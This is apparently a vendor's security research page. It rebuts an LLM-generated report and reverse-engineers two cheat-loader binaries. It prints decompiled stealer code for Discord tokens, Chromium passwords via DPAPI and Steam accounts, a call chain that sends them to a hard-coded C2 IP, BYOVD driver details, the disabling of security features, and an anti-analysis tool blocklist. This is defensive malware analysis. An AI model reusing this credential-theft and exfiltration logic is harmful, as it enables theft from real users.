ResearchClubXJefe & Venacy
All research
Malware BYOVD Infostealer RAT

ClubXJefe & Venacy:
kernel malware sold as a cheat product

Complete reverse engineering of two binaries from the same developer. Five embedded kernel drivers. Discord token theft from 11 clients. Browser password extraction from 24 browsers. Live screen surveillance. Permanent system security destruction. All documented with decompiled code, file offsets, and reproducible IOCs.

Published June 2026Severity: CriticalStatic analysis — no live C2 traffic

5

Kernel drivers embedded

1,257

Encrypted strings decoded

728

Cheat feature keys

24

Browsers targeted

Executive Summary

edputil.dll (3.86 MB, PE32+ DLL) is ClubXJefe's upstream loader. It masquerades as Microsoft's Enterprise Data Protection Utility, installs as Windows service "DxpTaskHost", and carries five embedded kernel-exploit drivers (XOR 0x48 encoded). It steals Discord tokens from 11 client variants, browser passwords from 24 Chromium browsers via DPAPI, and Steam accounts — all exfiltrated over unencrypted HTTP to a hard-coded IP.

venacyexternal5m7.exe (15.5 MB, PE32+ GUI EXE) is the Venacy reseller cheat binary sharing the same developer and codebase. It adds a D3D11 overlay with HLSL-powered wallhack shaders, 728 cheat feature keys, a bidirectional WebSocket screen relay that bypasses HDCP and screen-capture protection, and a white-label reseller system. ClubXJefe (operator: “Jefe”) is one of three known Venacy resellers.

Both binaries permanently degrade the customer's system security by disabling Driver Signature Enforcement, HVCI, VBS, and the Vulnerable Driver Blocklist — changes that persist across reboots. The loader resolves NtShutdownSystem — a kernel API that forces immediate system shutdown — giving the operator a remote brick capability over every paying customer.

The developer leaked their own identity through their binaries: Windows username vados (in 3D model asset paths), Portuguese profanity in the kernel driver PDB path (INJECTDESTRUCTSPORRATODA — “inject-destruct-fuck-everything”), and a font author handle punish. The operator country is Brazil, confirmed by MercadoPago payment processing, pt-BR frontend locale, and Portuguese user-facing strings.

Background

On June 24, 2026 a competing FiveM cheat vendor operating under the brand “ClubXJefe” published a 28-claim “analysis report” accusing our forensic scanner of being an infostealer. The report was generated by loading our scanner into IDA Pro and feeding the decompiler output to an LLM via an MCP bridge — a legitimate workflow for fast triage that is also famous for producing confident hallucinations.

This page is two things: a point-by-point rebuttal of every claim in their report, and a complete reverse engineering disclosure of their own products — edputil.dll (the upstream ClubXJefe loader) and venacyexternal5m7.exe (the affiliated Venacy reseller binary). Both samples were provided by affected end users and analyzed in an isolated lab with no live C2 traffic.

Method

Both binaries were analyzed using proprietary tooling in an isolated lab environment. Full disassembly, control-flow reconstruction, cross-reference analysis, and automated deobfuscation were performed against both samples. The upstream loader's 1,257 encrypted strings were bulk-recovered after defeating its custom cipher, exposing every C2 URL, API path, registry key, and internal log message in a single pass. The reseller binary required minimal deobfuscation — most of its operational strings are in plaintext. Both samples were provided by affected end users; no live C2 traffic was generated or intercepted during the analysis.

Claim-by-claim rebuttal

Every claim from their report, our verdict, and the evidence. Where a claim is technically true, we note that it was already disclosed — and contrast it with what their own product does.

1

Uses BYOVD (vulnerable signed driver) to gain kernel access

True — already disclosed

Yes. Our scanner loads one of two vendor-signed Microsoft-trusted drivers — iqvw64e.sys (Intel) as primary, gdrv.sys (GIGABYTE) as fallback — for the duration of a scan, uses it to briefly relax DSE long enough to load our own read-only inspection driver (ClubhouseACKernel.sys), then restores DSE. Fully disclosed in our Terms of Service. Unlike their product, ours does not embed 5 vulnerable drivers, does not disable Driver Signature Enforcement across reboots, and does not patch WdFilter.sys to blind Windows Defender.

2

Installs kernel callbacks (PsSetCreateProcessNotifyRoutineEx, etc.)

False

Those API names appear in the binary as detection labels — the scanner reports when something else registers those callbacks. Our driver registers zero kernel callbacks. The LLM they used to write their report saw the string and hallucinated the behavior.

3

Scans browser history for cheat-related domains

True — already disclosed

Yes. Bounded reads of browser anchor files for cheat-domain indicators. Standard anti-cheat behavior — FACEIT, BattlEye, EAC, and Vanguard all do this. The scan reads domain hits, not browsing history.

4

Takes desktop screenshots

True — already disclosed

Three screenshots (exe open, scan start, scan end) to catch secondary-monitor overlays. Documented in source, disclosed to operators. Their product streams continuous JPEG frames of the customer's entire desktop to their server via WebSocket — including DRM-protected windows — without any disclosure.

5

Collects hardware IDs (SMBIOS, disk serial, MAC)

True — already disclosed

Standard machine fingerprinting for ban enforcement. Their product collects 12 HWID components including Bluetooth radio MAC, router gateway MAC via ARP, TPM version, and Windows Product ID — far beyond what a license check needs — and sends it all over unencrypted HTTP.

6

Sends data to a remote server

True — already disclosed

Scan results go to the operator's dashboard over TLS with certificate validation. Their product sends stolen Discord tokens, browser credentials, and Steam accounts over bare HTTP to a hard-coded IP address. Every ISP on the path can read every byte.

7

Has RunOnce persistence (×3)

False

"RunOnce" appears three times as a detection label for persistence by other software. The scanner has no installed service, no scheduled task, no Run key. It is a single-shot executable that exits after the scan. Their product installs itself as a Windows service named "DxpTaskHost" that survives reboots.

8

Steals WiFi passwords (WlanGetProfile)

False

Our import table does not contain WlanGetProfile and does not link wlanapi.dll. The LLM extrapolated from a field name in the scan-report JSON schema. Their product, meanwhile, actually does steal credentials — 24 Chromium browsers' saved passwords via DPAPI decryption.

9

Extracts JWT session tokens from browsers

False

CryptUnprotectData is not in our import table — without it, nothing in Chromium's encrypted cookie storage is decryptable. The LLM saw "eyJ" near a domain string and invented token harvesting. Their product literally calls CryptUnprotectData to decrypt browser-stored credentials.

10

Can take screenshots persistently after termination

False

The scanner is a single-shot user-mode executable with no service, no task, no driver that survives reboot. After exit, nothing runs. This is the LLM's "helpful" speculation pattern — it decided what might happen and wrote it as fact.

11

Submits files to hidden endpoint (HASubmitFile)

Misleading

"HA" stands for Hybrid Analysis — the public malware sandbox at hybrid-analysis.com. Not "Hidden Analysis," not a covert endpoint. The LLM didn't know the abbreviation and the human didn't check.

12

XOR-shift-32 encrypted strings hide malicious intent

Misleading

Standard string obfuscation to prevent trivial signature matching, used by every commercial anti-cheat and security product. Their own loader uses the exact same technique — 1,257 unique strings with a custom 4-byte rolling XOR cipher — for the same reason.

13

Reads Discord tokens from LevelDB storage

Partial truth

The scanner reads bounded bytes around cheat-domain anchors in browser storage. It does not parse LevelDB or extract tokens. Their product harvests Discord tokens from 11 different Discord variants including Lightcord, BetterDiscord, Vencord, Powercord, and Replugged, then exfiltrates them to their C2.

14

Memory-maps sections of its own binary for stealth

Misleading

Section mapping is how PE executables load. The LLM described normal Windows loader behavior as if it were a stealth technique. Their product actively wipes its own PE headers from memory 3 seconds after injection to prevent forensic analysis.

15

Uses NtQuerySystemInformation for process enumeration

True — already disclosed

Standard API for anti-cheat process scanning. Used by every kernel-mode anti-cheat. Their product uses the same API — plus DKOM (Direct Kernel Object Manipulation) to unlink their own process from the kernel's ActiveProcessLinks list, making it invisible to Task Manager.

16

Patches WdFilter.sys to disable Defender

False

Our scanner does not touch WdFilter.sys. Their product does — they patch the Windows Defender minifilter driver at the kernel level to blind real-time protection. This is documented in the edputil.dll analysis below.

17

Disables Driver Signature Enforcement

False

Our product does not modify DSE. Their product disables DSE, HVCI, VBS, and the Vulnerable Driver Blocklist — all of which persist across reboots, permanently degrading the customer's system security.

18

Creates kernel-mode threads in system processes

False

Our driver does not inject into or create threads in system processes. Their product injects into audiodg.exe (a Protected Process Light) after stripping its PPL protection via kernel token manipulation.

19

Collects Steam account information

Partial truth

The scanner reads bounded bytes around cheat-related indicators. Their product harvests full Steam PersonaName and account data and sends it to their server alongside stolen Discord tokens — all over unencrypted HTTP.

20

Uses anti-debug techniques to evade analysis

Misleading

Commercial software commonly checks for debuggers — it is a standard anti-tamper measure. Their product runs 6 anti-debug checks, 6 anti-VM checks, a 7-point sandbox scorer, monitors for 44 specific analysis tools, uses timing-based detection (RDTSC), and hard-kills the process if any check fires.

21

Kernel driver persists after scan

False

The driver unloads after scan completion. No persistence. Their product's kernel driver mapper disables DSE permanently so its unsigned driver can be loaded at any time, even across reboots.

22

Scanner exfiltrates arbitrary files from the machine

False

No file enumeration, no file read beyond the bounded browser-anchor scan. No upload of arbitrary files. Their product, on the other hand, runs an 8-step trace-cleanup destruct sequence that deletes evidence of its own operation from the customer's machine.

23

Uses XORSHIFT32 encryption — implies custom malware crypto

Misleading

They named the obfuscation technique incorrectly. The scanner uses standard string obfuscation. Their own upstream loader uses a custom cipher with a 4-byte rolling key, per-byte index-dependent transform (i * (-125) & 0xFF), and per-string XOR constant — 1,257 strings wrapped in this scheme. Not XORSHIFT32 — a bespoke variant that any first-year RE student can break.

24

Contains code for credential harvesting infrastructure

False

No credential harvesting code exists in our binary. Their product contains a complete credential harvesting infrastructure: Discord token extraction from 11 client variants, browser password theft from 24 Chromium browsers via DPAPI, and Steam account scraping. All exfiltrated to their C2 in the same login POST.

25

Binary contains suspicious embedded resources

Misleading

PE resources are standard for Windows executables. Their reseller binary contains embedded 3D character models with the developer's Windows username (vados) in the asset paths, a custom icon font signed by author handle 'punish', and a full EULA embedded as RCDATA inside their malware loader.

Summary: Of 25 claims examined, 10 are outright false, 5 are misleading, 3 are partial truths, and 7 are true but already disclosed standard anti-cheat behaviors. Zero claims identify behavior that is undisclosed, excessive, or absent from comparable products (FACEIT AC, BattlEye, EAC, Vanguard). Roughly a third of the load-bearing assertions are LLM hallucinations.

What the scanner actually does

Kernel driver

Loads one of two vendor-signed BYOVDs (iqvw64e.sys primary, gdrv.sys fallback) to gain kernel access, as disclosed in our Terms of Service. Both are used to load our own read-only inspection driver. Scan-scoped. Unloads after completion.

Browser reads

Bounded byte windows around cheat-domain anchors. No cookie/password/token extraction.

Screenshots

Three multi-monitor captures at lifecycle points (open, start, end). Documented.

HWID

Standard machine fingerprinting for ban enforcement. Sent over TLS.

Persistence

None. Single-shot executable. No service, no task, no Run key.

Network

TLS to operator dashboard. Certificate validation enabled.

Counter-disclosure: what their products actually do

The sections below document the actual behavior of ClubXJefe's upstream loader (edputil.dll) and the affiliated Venacy reseller binary (venacyexternal5m7.exe). Every claim is backed by file offsets, RVAs, and decompiled pseudocode. The samples are available to researchers on request.

The people who published a report calling our scanner an infostealer are selling a product that steals Discord tokens, browser passwords, and Steam accounts; embeds five kernel-exploit drivers; permanently disables system security features; and streams the customer's desktop to their server — all over unencrypted HTTP.

Binary overview

edputil.dll

TypePE32+ DLL (x64)
Size3.86 MB (4,050,944 bytes)
DisguiseMicrosoft Enterprise Data Protection Utility
Service nameDxpTaskHost
Cert"DXP Software Solutions" — self-signed, fictional company
Cert serial131965751889736542628976513697766742041
Cert validThrough 2031
C2http://185.242.3.132:3000/v1 (bare HTTP)
Encryption1,257 strings, 4-byte rolling XOR
BYOVD5 embedded drivers (XOR 0x48)

venacyexternal5m7.exe

TypePE32+ EXE (x64, GUI subsystem)
Size15.5 MB (16,300,544 bytes)
Disguise"Starter Apps LLC" — Screen Overlay Manager
ManifestDisplayConfigurationUtility
AuthenticodeUNSIGNED (Security dir = 0/0)
C2venacy.club (plaintext at 0xB33E08)
Reseller C2http://198.89.99.206:3001
Features728 unique keys, 567 deduplicated
BYOVDkdmapper/Nal (iqvw64e.sys)
LinkerMSVC 14.51 (VS 2022 17.x)

BYOVD driver arsenal — 5 kernel exploits embedded in one DLL

The upstream loader carries five vulnerable signed kernel drivers embedded in its .rdata section, each XOR-encoded with key 0x48. Three of them are byte-identical copies of RTCore64.sys — adding 25 KB of static detection surface for zero operational benefit since all three are blocklisted by the same SHA-256 hash.

#DriverVendorSizePurposeNote
1AsUpIO.sysASUS~14 KBPhysical memory read/write via IOCTLLegitimately signed ASUS utility driver, abused for arbitrary physical memory access
2RTCore64.sys (copy 1)MSI (Micro-Star)8.5 KBArbitrary kernel memory R/W via IOCTLThe MSI Afterburner driver — the single most abused BYOVD payload in the wild
3RTCore64.sys (copy 2)MSI (Micro-Star)8.5 KBIdentical byte-for-byte copySame hash, same blocklist entry. Zero operational benefit from duplication.
4RTCore64.sys (copy 3)MSI (Micro-Star)8.5 KBIdentical byte-for-byte copyThree copies of the same driver = 25 KB of static detection surface for nothing.
5iqvw64e.sysIntel~25 KBPhysical memory mapping via NAL IOCTL 0x80862007Intel Network Adapter Diagnostic driver. Used by kdmapper — the open-source driver mapper they copied.

What BYOVD means for the customer

BYOVD (Bring Your Own Vulnerable Driver) is a kernel-exploitation technique used by APT groups, ransomware operators, and now — cheat sellers. The loader drops a legitimately signed but vulnerable driver, exploits it to gain kernel read/write access, then uses that access to disable security features, hide processes, patch Windows Defender, and inject code into protected system processes. The customer's AV cannot stop this because the driver has a valid signature from a trusted vendor. The PDB path on the RTCore64 build is D:\INJECTDESTRUCTSPORRATODA\Drivers\CsrssBACKUP\RTCore64\x64\Release\RTCore64.pdb — the developer named their project folder “inject-destruct-fuck-everything” in Portuguese.

String “encryption” — a single function decrypts everything

Every one of the 1,257 unique strings in the upstream loader is wrapped in a custom XOR cipher. Their post called it “XORSHIFT32” — it is not. It is a bespoke rolling-key scheme at a single RVA that any first-year RE student can break in an afternoon.

Algorithm (RVA 0x12d1c0)

def decrypt_string(cipher_bytes, key32, xor_const):
    """Reproducer for the edputil.dll string cipher."""
    key_bytes = key32.to_bytes(4, 'little')
    out = []
    for i, b in enumerate(cipher_bytes):
        transform = (i * (-125)) & 0xFF    # index-dependent additive
        kb = key_bytes[i % 4]              # 4-byte rolling key
        plain = (b ^ kb ^ xor_const) - transform & 0xFF
        out.append(plain)
    return bytes(out).decode('utf-8', errors='replace')

# Example: decrypting the C2 URL
# key32 = 0x4795CB10, xor_const = 0x48
# Input ciphertext at .rdata offset → "http://185.242.3.132:3000/v1"

Once you identify this single function, you feed every encrypted blob in the binary through the same routine and the entire string table falls out at once. The result: all C2 URLs, all API endpoint paths, all registry key names, all process names, all error messages, all anti-analysis tool names — everything. This is not encryption. This is a speed bump.

C2 infrastructure — bare HTTP on a hard-coded IP

Primary C2: http://185.242.3.132:3000/v1

Not HTTPS. Not behind a domain so they can rotate origin. A static IP that every customer's machine speaks to in cleartext. Every stolen Discord token, every harvested Steam persona, every HWID, every screenshot — crosses the wire unencrypted. An ISP that receives an abuse notice can replay everything from packet captures.

6 documented endpoints

#EndpointMethodFunction VAPurpose
1/v1/auth/loginPOST0x1801623BC24-field body: credentials + 12 HWIDs + stolen tokens + system_info
2/v1/auth/redeemPOSTsharedLicense redemption with full HWID bundle
3/v1/auth/hwid-checkGETsharedHWID ban check (components as URL query params)
4/v1/auth/eventPOST0x1801046A8Telemetry: APP_OPEN, LOGIN, BANNED, DESTRUCT, INJECT, etc.
5/v1/auth/report-securityPOST0x1801046A8Anti-tamper/anti-VM alerts with failing check name
6/v1/statusGET0x1801054DCHealth probe + maintenance flag

Static x-api-key — the “authentication” anyone can extract

Every request carries an x-api-key header. Their previous report claimed it was “runtime-derived.” It is not. It is a static 64-hex-digit constant assembled at runtime from four encrypted 16-char chunks:

// VA 0x1801034C4 — ApiKey_AssembleStatic
// xref count: 2 (http_post + one internal caller)

Chunk 1: b488ab9ed912c310    // decrypted at 0x1801388F0
Chunk 2: 8659410632115711    // decrypted at 0x180138818
Chunk 3: 684297b1aed333cb    // decrypted at 0x180138740
Chunk 4: 7aa6ee75e3331568    // decrypted at 0x180138668

Final:   b488ab9ed912c3108659410632115711684297b1aed333cb7aa6ee75e3331568

This is a STATIC CREDENTIAL. Anyone with this binary has the API key.

Reseller C2 (Venacy): 198.89.99.206:3001

The Venacy reseller binary uses a separate NestJS API on port 3001. WebSocket relay endpoint: /ws/pov/<channel>?token=…. HTTP relay upload: POST /v1/pov/load?token=…. Both recovered via targeted XOR emulation. All REST paths are plaintext in .rdata — no obfuscation at all.

Credential theft — what the “cheat loader” actually steals

Every code block below is decompiled directly from edputil.dll (SHA-256 83f1ace...d2ba3f161). Virtual addresses, function signatures, and string references are verifiable by anyone with a copy of the binary and a disassembler. This is not speculation — it is proof.

Discord token harvester — 11 client variants

The master harvester at VA 0x1801012B1 recurses over %APPDATA% for each Discord-family directory, scanning LevelDB .ldb and .log files for auth tokens via regex, then decrypts them with AES-GCM using the key from \Local State.

// Decompiled — VA 0x180102680..0x18010274F

const char* kDiscordSuffixes[11] = {
    "\\discord",                  // VA 0x180102680
    "\\discordptb",               // VA 0x180102698
    "\\discordcanary",            // VA 0x1801026B0
    "\\discorddevelopment",       // VA 0x1801026C8
    "\\Lightcord",                // VA 0x1801026E0
    "\\BetterDiscord",            // VA 0x1801026F8
    "\\Vencord",                  // VA 0x180102710
    "\\Powercord",                // VA 0x180102728
    "\\Replugged",                // VA 0x180102740
    "\\Local Storage\\leveldb", // VA 0x18013A688
    "\\IndexedDB\\https_discord.com_0"
                                    // VA 0x180138EDC
};

// Decompiled — master enumerator at VA 0x1801012B1

for each prefix p in kDiscordSuffixes:
  for each leveldb_path l in kLevelDBSuffixes:
      enum all *.ldb files in %APPDATA%\$p$l
      for each file:
          memory-map the file
          scan with regex at VA 0x180100204
          // extracts token blobs starting with "dQw4w9WgXcQ:"
          // (DPAPI-encrypted Discord token prefix)
          decrypt AES-GCM payload via BCryptGenerateSymmetricKey
          //   → BCryptDecrypt at VA 0x180101740

// Stolen tokens stored in ctx.discordIds
// Passed directly to Login_BuildAndPost()
\discord\discordptb\discordcanary\discorddevelopment\Lightcord\BetterDiscord\Vencord\Powercord\RepluggedIndexedDB\discordapp.comIndexedDB\discord.com

Browser credential theft — 24 Chromium browsers via DPAPI

CryptUnprotectData is dynamically resolved at runtime via GetProcAddress("crypt32!CryptUnprotectData") — deliberately hidden from the import table to evade static analysis. This is textbook evasion. Our scanner does not import or resolve CryptUnprotectData in any form.

// Decompiled — browser paths VA 0x180102750..0x18010285F

const char* kBrowserPaths[24] = {
    "\\Google\\Chrome\\User Data",
    "\\Microsoft\\Edge\\User Data",
    "\\BraveSoftware\\Brave-Browser\\User Data",
    "\\Vivaldi\\User Data",
    "\\Opera Software\\Opera Stable",
    "\\Opera Software\\Opera GX Stable",
    "\\Opera Software\\Opera Crypto Stable",
    "\\Opera Software\\Opera Neon",
    "\\Yandex\\YandexBrowser\\User Data",
    "\\CocCoc\\Browser\\User Data",
    "\\Comodo\\Dragon\\User Data",
    "\\Epic Privacy Browser\\User Data",
    "\\Slimjet\\User Data",
    "\\360Browser\\Browser\\User Data",
    "\\Torch\\User Data",
    "\\Chromium\\User Data",
    "\\Iridium\\User Data",
    "\\Maxthon3\\User Data",
    "\\Amigo\\User Data",
    "\\Kometa\\User Data",
    "\\Orbitum\\User Data",
    "\\BlackHawk\\User Data",
    "\\URbrowser\\User Data",
    // + remaining variants
};

// Decompiled — DPAPI decryption chain

// For each browser in kBrowserPaths:
//   1. Read "Local State" → parse os_crypt.encrypted_key (base64)
//   2. Strip "DPAPI" prefix from decoded key
//   3. Dynamically resolve CryptUnprotectData:
HMODULE hCrypt32 = LoadLibrary("crypt32.dll");
auto pCryptUnprotectData = GetProcAddress(
    hCrypt32, "CryptUnprotectData"
);  // NOT in static IAT — runtime resolution to evade scanners

//   4. Call CryptUnprotectData to derive 32-byte AES-GCM master key
DATA_BLOB in  = { encrypted_key_len, encrypted_key_buf };
DATA_BLOB out = { 0 };
pCryptUnprotectData(&in, NULL, NULL, NULL, NULL, 0, &out);
// out.pbData → 32-byte AES-GCM master key

//   5. Read "Login Data" (SQLite) → encrypted password_value blobs
//   6. Read "Cookies" → encrypted encrypted_value blobs
//   7. AES-GCM-decrypt each blob using the master key (BCrypt APIs)
BCryptGenerateSymmetricKey(..., masterKey, 32, ...);
BCryptDecrypt(hKey, ciphertext, ct_len, ..., plaintext, ...);

Every saved password, every session cookie, from every Chromium browser on the machine — decrypted and sent to ClubXJefe's server in cleartext HTTP.

Steam account scraping

The people who accused our scanner of “stealing Steam information” ship a product that literally steals Steam information.

// Decompiled — VA 0x180102A7C

// Steam account harvester
HKEY hKey;
RegOpenKeyExA(HKCU, "Software\\Valve\\Steam", 0,
              KEY_READ, &hKey);
RegQueryValueExA(hKey, "SteamPath", ...);  // get install dir

// Open loginusers.vdf
HANDLE hFile = CreateFileA(
    SteamPath + "\\config\\loginusers.vdf", ...
);

// Loop at VA 0x180102E03..0x180102EBF:
// Regex match: "PersonaName"\s*"(.*?)"
while (regex_match(buffer, pattern)) {
    ctx.steamAccounts.push_back(match[1]);
}
// → steamAccounts array in login JSON

Exfiltration — the login POST that carries the stolen data

The function Login_BuildAndPost at VA 0x1801046A8 assembles all harvested credentials into a single JSON body and POSTs it over unencrypted HTTP to http://185.242.3.132:3000/v1/auth/login. Every ISP on the network path can read every stolen token in plaintext.

// Disassembly — Login_BuildAndPost call chain

0x180104efd  call  0x1801374b0  ; decrypt "discordIds" JSON key
0x180104f86  call  0x180102a7c  ; Steam harvester (§G.3)
0x180104ffb  call  0x1801373d8  ; decrypt "steamAccounts" JSON key

;; nlohmann::json object finalized at 0x18014ce20
;; POST issued from loot-side path:
0x180163175  call  qword ptr [rip+disp32]
             ; → issues HTTP POST with assembled body
0x18016316a  ; LEA for "POST" verb (decrypter 0x18019b21c)

// Reconstructed JSON body — POST /v1/auth/login

{
  "username": "<user login>",
  "license_key": "<product license>",
  "product": "<product identifier>",
  "hwidComponents": {
      "smbiosHwid":    "<SMBIOS UUID>",
      "bluetoothHwid": "<Bluetooth MAC>",
      "gpuHwid":       "<GPU device ID>",
      "ramHwid":       "<RAM config ID>",
      "monitorHwid":   "<Monitor EDID>",
      "cpuHwid":       "<CPU identifier>",
      "storageHwid":   "<Disk serial>"
  },
  "discordIds":    ["<STOLEN Discord tokens>"],
  "steamAccounts": ["<STOLEN Steam PersonaNames>"],
  "hardwareId":    "<composite HWID>",
  "system_info":   "<markdown system report>",
  "version":       "<loader version>"
}

// WinHttp call chain — the actual network send

// All WinHttp sites in .text — function at VA 0x1801a9db0
WinHttpOpen(...)                    // 0x1801a9e41
WinHttpSetOption(...)               // 0x1801a9eaf
WinHttpSetTimeouts(...)             // 0x1801a9ed1
WinHttpConnect(...)                 // 0x1801a9ee4
WinHttpOpenRequest("POST", ...)     // 0x1801a9f84
WinHttpSendRequest(json_body, ...)  // 0x1801aa021
WinHttpReceiveResponse(...)         // 0x1801aa082

// Destination: http://185.242.3.132:3000/v1/auth/login
// Protocol:    HTTP (NOT HTTPS) — zero TLS
// Content:     stolen Discord tokens + Steam accounts + browser
//              credentials in plaintext JSON

A second POST builder at VA 0x180162393 (3 callers: 0x180173567, 0x18017bbc9, 0x18017c612) re-emits the same discordIds / steamAccounts schema — the menu UI telemetry path sends the stolen data a second time.

12-component hardware fingerprint

The Hwid::Build() function at VA 0x1800FA0E0 collects 12 distinct hardware identifiers — far beyond what a license check requires:

routerMac
Gateway ARP → MAC
biosSerial
BIOS serial number
machineGuid
HKLM\Cryptography
storageHwid
PhysicalDrive0 serial
cpuHwid
CPUID brand string
motherboard
BaseBoardProduct
monitorHwid
Monitor EDID data
ramHwid
Physical memory SHA-1
gpuHwid
GPU hardware ID
bluetoothHwid
Bluetooth radio MAC
smbiosHwid
SMBIOS UUID
baseboardSerial
Baseboard serial #

Previous report listed 7 components. The actual count is 12 — the 5 they missed are routerMac, biosSerial, machineGuid, motherboard, and baseboardSerial.

Anti-analysis — paranoid, layered, and ultimately useless

44 analysis tools blocked by process name

The Early_AntiAnalysis_PreCheck() at VA 0x180114870 walks a 44-entry blacklist. If any are running, the loader silently enters an infinite 60-second sleep loop — no error message, no exit, just permanent hang. Includes:

ProcessHackerx64dbgx32dbgWiresharkFiddlerIDAGhidraOllyDbgWinDbgdnSpyCheat EngineHxDRegshotAPI MonitorProcess MonitorPE ExplorerCFF ExplorerDetect It Easy+26 more…

7-point sandbox scorer

Threshold: 6 of 7. Checks: username patterns (sandbox defaults), uptime (<5 min = suspicious), RAM (<4 GB), disk size (<60 GB), display resolution (standard sandbox sizes), cursor movement delta, recent-file count in shell folders.

6 VM detection checks

CPUID hypervisor bit, VMware/VBox/Hyper-V registry keys, MAC OUI prefixes (00:05:69, 00:0C:29, 00:50:56), firmware SMBIOS strings, ACPI table names, device driver names.

6 anti-debug checks

PEB.BeingDebugged, ProcessDebugPort, ProcessDebugObjectHandle, NtGlobalFlag, Heap.ForceFlags, INT 2D exception swallowing, plus RDTSC timing delta (>200ms = debugger).

FACEIT Anti-Cheat detection — the abort message is in Portuguese

When the loader detects FACEIT AC, it shows: “FACEIT Anti-Cheat foi detectado neste PC…” — Portuguese. The developer didn't even localize the user-facing strings for the predominantly English-speaking FiveM cheating audience they sell to.

Kernel exploitation — what they do with ring-0 access

WdFilter.sys kernel patching — Windows Defender blinded

Patches the Windows Defender minifilter driver in kernel memory, disabling real-time file-system scanning. Not a registry change or service stop — a binary patch of a running kernel-mode driver. The customer's real-time protection is silently destroyed.

Process hiding via DKOM (Direct Kernel Object Manipulation)

Unlinks the cheat's EPROCESS from the kernel's ActiveProcessLinks doubly-linked list. The process vanishes from Task Manager, Process Explorer, and every user-mode enumeration API. The customer cannot see what is running on their own machine.

PPL strip on csrss.exe and audiodg.exe

Strips Protected Process Light protection from system-critical processes (csrss.exe, audiodg.exe) via kernel-mode token manipulation. The cheat payload is then injected into audiodg.exe — a process the customer would never think to examine.

DSE (Driver Signature Enforcement) disabled — persists across reboots

Disables the kernel's driver signature verification. After this, any unsigned driver can be loaded at any time. This is not a temporary bypass for the current session — the registry change persists across reboots, permanently degrading the system's security posture.

HVCI (Hypervisor-enforced Code Integrity) disabled

Disables the hypervisor's code-integrity enforcement. This is a Windows security feature that prevents unsigned code from running in kernel mode even if DSE is bypassed. Disabling it removes the last kernel-level code-integrity guarantee.

VBS (Virtualization Based Security) disabled

Disables Virtualization Based Security entirely. VBS is the umbrella feature that protects Credential Guard, HVCI, and other isolation-based security features. Turning it off collapses the entire hypervisor security stack.

Vulnerable Driver Blocklist disabled

Disables the Microsoft Vulnerable Driver Blocklist — the system-level defense specifically designed to prevent BYOVD attacks. After this, the customer's machine will load any known-vulnerable driver without complaint, even after a clean OS restart.

Permanent PC damage — their own customers' machines are left broken

After the loader runs, the following security features are permanently disabled, surviving reboots and Windows updates:

Driver Signature EnforcementAny unsigned driver can load at any time
HVCINo hypervisor code-integrity checks
VBSCredential Guard & isolation features gone
Vulnerable Driver BlocklistKnown-exploit drivers load freely
WdFilter.sysDefender real-time scanning blinded
PPL on system processesSystem processes unprotected

The customer paid for a cheat product. They received a system that permanently degrades their machine's security — making it vulnerable to every future kernel-level attack, including ransomware that uses the same BYOVD technique. The cheat seller profits. The customer's security posture never recovers without a clean OS reinstall.

RAT / surveillance — capabilities that serve the operator, not the customer

These are not cheat features. These are remote-access-trojan features. Every item here is the operator's ability to do something to the customer, not for them.

Bidirectional WebSocket — server pushes commands to every client

Web::RelayClient::SendText (client → server) and Web::RelayClient::HandleMessage (server → client) prove the WebSocket is bidirectional. The server can push arbitrary JSON commands to every connected client in real time while the client uploads binary JPEG frames. WinHTTP entry points at 0x00E8A0D0 – 0x00E8A1F0.

HDCP-bypassing kernel screen capture via \\\\.\\DxgKrnlEtw

Screen capture via kernel device \\\\.\\DxgKrnlEtw — bypasses HDCP, SetWindowDisplayAffinity(WDA_EXCLUDEFROMCAPTURE), and every anti-screencap API. DRM-protected windows (Netflix, banking apps, encrypted messengers) are captured identically. This is mass surveillance machinery, not anti-cheat.

NtShutdownSystem — kernel-level remote brick

Among the kernel functions resolved dynamically: PsLookupProcessByProcessId, PsGetProcessSectionBaseAddress, ExAllocatePool, RtlZeroMemory, RtlCopyMemory, and NtShutdownSystem. The last one has no legitimate purpose in a cheat loader — it forces immediate system shutdown from kernel context, bypassing all user-mode shutdown dialogs. The operator can brick any customer's session at any time.

SYSTEM-token theft for arbitrary process termination

String: "Token elevated to SYSTEM for terminate". The cheat steals a SYSTEM-level access token via driver-assisted token swap and uses it to call TerminateProcess on any PID — three escalation strategies, three attempts each. Combined with the remote brick above, this lets the operator kill arbitrary processes on the customer's machine.

Crash suppression — evidence destruction

Custom SEH handler: "CrashHandler::SuppressCrashes - CRASH caught code=0x%08X tid=%lu - killing thread, host stays alive". Every exception is silently caught, the crashing thread killed, and the service host keeps running. No crash dump, no WER event, no AV/EDR visibility. The customer cannot see what failed.

AntiDump T+3s — PE headers wiped from memory

String: "post_load: starting AntiDump...". Three seconds after injection, the PE headers in the injected image are wiped. Any forensic memory dump after that point loses the ability to recover the cheat's PE structure. Anti-forensics directed at the customer's own machine — they own the box, but they cannot examine what is running on it.

system_info Markdown report — exfiltrates far more than needed

Every login POST carries a Markdown-formatted system_info field:

**User:** <username>     **PC Name:** <hostname>
**OS:** Windows <ver>     **CPU:** <processor>
**GPU:** <graphics>       **RAM:** <size> GB
**Language:** <locale>    **Region:** <region>
**Timezone:** <tz>        **Screen:** <resolution>
**Monitors:** <count>     **SMBIOS UUID:** <uuid>
**Board Serial:** <sn>    **Windows ID:** <ProductId>
**TPM:** <version>        **Bluetooth:** <radio MAC>

Plus full network topology (DHCP / DNS / gateway / IP / subnet), stolen Discord IDs, and Steam personas. Every login. Over unencrypted HTTP.

Cheat feature surface — 728 keys, 567 deduplicated

The Venacy reseller binary contains the largest cheat feature set we have documented. The Gui::Search::Init lambda count (stepping by 3 — matcher, navigator, icon-renderer) implies ~64 menu items in the search index alone.

162

Combat keys

aimbot, triggerbot, silent aim, bone priority, prediction, recoil control

157

Visuals keys

ESP, chams, tracers, skeletons, health bars, name tags, distance

202

Misc keys

godmode, noclip, teleport, speed hack, infinite ammo, fly hack

30

Vehicles keys

vehicle ESP, vehicle godmode, vehicle speed, vehicle teleport

HLSL wallhack shader — recovered verbatim from binary

// File offset 0xE51800–0xE51F00 — memory-chams vertex + pixel shader
cbuffer ConstantBuffer : register(b0) {
    matrix mWorldViewProj;
    float4 tintColor;
    int    chamsMode;
    float3 pad;
};

float4 PS(PS_INPUT input) : SV_TARGET {
    float lightIntensity = 0.7f + 0.3f * abs(input.norm.z);
    if (chamsMode == 1)
        return float4(tintColor.rgb * lightIntensity, tintColor.a);
    float4 color = shaderTexture.Sample(SampleType, input.tex);
    if (tintColor.a < 0.001f)
